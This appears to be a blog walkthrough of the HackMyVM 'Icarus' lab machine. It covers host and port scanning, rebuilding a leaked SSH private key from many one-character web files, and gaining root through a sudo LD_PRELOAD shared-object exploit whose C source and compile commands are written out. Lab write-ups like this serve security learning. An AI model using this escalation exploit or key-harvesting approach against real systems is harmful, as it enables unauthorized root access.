HackMyVM - Icarus


Icarus is a medium difficulty VM by "sml" that I blundered my way through somehow...
Quite a nice VM and made me think!

Find it

└─$ sudo netdiscover -r 10.0.0.0/24 -P
[sudo] password for kali:
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.0.0.1        08:00:27:95:67:5b      1      60  PCS Systemtechnik GmbH
 10.0.0.111      08:00:27:6d:e2:b6      1      60  PCS Systemtechnik GmbH

-- Active scan completed, 2 Hosts found.

Scan it

nmap
# Nmap 7.91 scan initiated Wed Dec 29 12:56:30 2021 as: nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.111
Nmap scan report for 10.0.0.111
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 b6:65:56:40:8d:a8:57:b9:15:1e:0e:1f:a5:d0:52:3a (RSA)
|   256 79:65:cb:2a:06:82:13:d3:76:6b:1c:55:cd:8f:07:b7 (ECDSA)
|_  256 b1:34:e5:21:a0:28:30:c0:6c:01:0e:b0:7b:8f:b8:c6 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: LOGIN
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.111/ -x html,php,txt -t 150
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.0.111/
[+] Method:                  GET
[+] Threads:                 150
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php,txt
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2021/12/30 06:35:12 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 407]
/xml                  (Status: 200) [Size: 1]
/login.php            (Status: 200) [Size: 407]
/a                    (Status: 200) [Size: 9641]
/xxx                  (Status: 200) [Size: 1]
/check.php            (Status: 200) [Size: 21]
/xsl                  (Status: 200) [Size: 1]
/xbl                  (Status: 200) [Size: 1]
/xap                  (Status: 200) [Size: 1]
/xav                  (Status: 200) [Size: 1]
/xss                  (Status: 200) [Size: 1]
... <lots of other files begining x*>

User

the file "a" was largest so a reasonable place to start.
wget http://10.0.0.111/a
this appears to be a list of all the files so lets just download them all and see if anything turns up

mkdir xfiles

cat fetch.sh
while IFS="" read -r p || [ -n "$p" ]
do
  printf '%s\n' "$p"
  wget wget --directory-prefix=xfiles/ http://10.0.0.111/$p
 printf "$P"
done < a

this downloads them all, now see if there is anything useful in any of them...
cd xfiles
cat x*

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA5xagxLiN5ObhPjNcs2I2ckcYrErKaunOwm40kTBnJ6vrbdRYHteS
afNWC6xFFzwO77+Kze229eK4ddZcwmU0IdN02Y8nYrxhl8lOc+e5T0Ajz+tRmLGoxJVPsS
TzKBERlWpKuJoGO/CEFLOv6PP6s79YYzZFpdUjaczY96jgICftzNZS+VkBXuLjKr79h4Tw....

out of chaos there comes an order.... the files are only 1 char long but put together the build an ssh key.

The username was a little more fund but I eventually found it was icarus (yes that took me a while to try the name of the server!)
so copy & paste the revealed private key to icarus.key
chmod 600 icarus.key
ssh icarus@10.0.0.111 -i icarus.key

Escalate to root

icarus@icarus:~$ sudo -l
Matching Defaults entries for icarus on icarus:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User icarus may run the following commands on icarus:
    (ALL : ALL) NOPASSWD: /usr/bin/id
icarus@icarus:~$

listing sudo rights, "id" is a bit useless we tweak the environment preload!


create a file shell.c in /tmp
#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/sh"); }

gcc -fPIC -shared -o shell.so shell.c -nostartfiles ls -al shell.so sudo LD_PRELOAD=/tmp/shell.so id


And its rooted.






Comments

Post a Comment

Popular posts from this blog

Zeug - HackMyVM

Image
  This was a really nice machine, if you like to be annoyed by trying to do the same thing many different ways until you eventually get somewhere... Thank you c4rta - looking forward to your next machine ;) Find it sudo netdiscover -r 10.0.0.0/24 -i eth1 -P  _____________________________________________________________________________    IP            At MAC Address     Count     Len  MAC Vendor / Hostname        -----------------------------------------------------------------------------  10.0.0.1        08:00:27:41:d0:fa      1      60  PCS Systemtechnik GmbH  10.0.0.123      08:00:27:fc:d6:0f      1      60  PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found. nmap -v -T4 -p- 10.0.0.123        Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-07 04:21 EST Initiating Ping Scan at 04:21 Scanning 10.0.0.123 [2 ports] Completed Ping Scan at 04:21, 0.01s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 04:21 Completed Parallel DNS resolution of 1 host
Read more

Espo - HackMyVM

Image
Another interesting machine from cromiphi... Writeup abridged to remove the several hour pause before making any progress!!! Discovery: ┌──( kali㉿kali )-[ ~/hmv/espo ] └─ $ sudo netdiscover -r 10.0.0.0/24 -i eth1 -P _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.0.0.1 08:00:27:c5:8d:93 1 60 PCS Systemtechnik GmbH 10.0.0.161 08:00:27:4f:55:18 1 60 PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found. ┌──( kali㉿kali )-[ ~/hmv/espo ] └─ $ sudo nmap -sC -sV -O -p- -oN nmap.out 10.0.0.161 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-08 05:21 EST Nmap scan report for 10.0.0.161 Host is up (0.0016s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
Read more

HackMyVM - Comingsoon

Image
  Find it └─ $ sudo netdiscover -r 10.0.0.0/24 -P | tee findit [sudo] password for kali:     _____________________________________________________________________________    IP             At MAC Address     Count     Len   MAC Vendor / Hostname         -----------------------------------------------------------------------------   10.0.0.1         08:00:27:96:87:13       1       60   PCS Systemtechnik GmbH   10.0.0.90       08:00:27:03:05:3c       1       60   PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found.      Scan it └─ $ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.90   Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 12:49 EST Nmap scan report for 10.0.0.90 Host is up (0.00097s latency). Not shown: 65533 closed ports PORT   STATE SERVICE VERSION 22/tcp open   ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey:   |   3072 bc:fb:ec:b8:93:d4:e2:78:76:eb:1b:dc:4b:a7:7f:9b (RSA) |   256 31:41:a0:d7:e9:3c:79:11:c2:f0:81:a0:fe:2d:f9:b0 (ECDSA) |_  
Read more